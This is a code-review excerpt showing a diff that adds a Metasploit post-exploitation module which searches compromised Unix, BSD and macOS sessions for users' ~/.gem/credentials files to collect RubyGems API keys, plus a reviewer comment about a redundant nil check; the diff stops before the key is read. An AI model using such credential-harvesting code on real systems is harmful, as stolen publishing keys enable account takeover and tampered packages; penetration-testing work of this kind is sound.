modules/post/multi/gather/rubygems_api_key.rb

```diff
@@ -0,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'yaml'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi RubyGems API Key Gather ./gem/credentials',
+      'Description'   => %q{
+        This module obtains a user's RubyGems API key from ~/.gem/credentials.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
+                           'Brandon Myers <bmyers[at]trustwave.com>' ],
+      'Platform'      => %w{ bsd linux osx unix },
+      'SessionTypes'  => [ 'shell' ]
+    ))
+  end
+
+  def run
+    print_status("Finding .gem/credentials")
+    paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
+    paths = paths.select { |f| file?(f) }
+
+    if paths.nil? or paths.empty?
```

Comment:
You are correct. My mistake. I don't think you need the ```nil``` check, so you should be fine with ```if paths.empty?```.